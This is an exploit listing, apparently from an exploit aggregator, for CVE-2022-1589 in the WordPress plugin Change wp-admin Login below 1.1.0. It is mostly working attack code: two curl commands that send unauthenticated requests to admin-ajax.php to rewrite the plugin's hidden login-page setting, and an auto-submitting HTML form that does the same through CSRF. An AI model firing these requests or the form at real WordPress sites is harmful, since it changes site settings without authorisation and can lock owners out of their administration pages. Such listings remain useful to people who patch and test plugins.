Exploit for Change wp-admin Login < 1.1.0 - Unauthenticated Arbitrary Settings Update CVE-2022-1589

Name: Exploit for Change wp-admin Login < 1.1.0 - Unauthenticated Arbitrary Settings Update CVE-2022-1589
Rating: 5 (66 reviews)

2022-05-09 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:257F9E14-4F43-4852-8384-80C15D087633
curl --url 'https://example.com/wp-admin/admin-ajax.php/%0a/wp-admin/options-permalink.php?action=aa' --data 'rwl_page=changed-by-attacker&rwl_redirect_field=404'

v >= 1.0.8 & <= 1.1.0 - curl --url 'https://example.com/wp-admin/admin-ajax.php?action=aa' --data 'rwl_page=changed-by-attacker&rwl_redirect_field=404&permalink_structure=1'

Via CSRF:

<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
    <input type="text" name="rwl_page" value="sesame-open">
    <input type="text" name="rwl_redirect_field" value="404">
</form>
<script>
    document.getElementById("test").submit();
</script>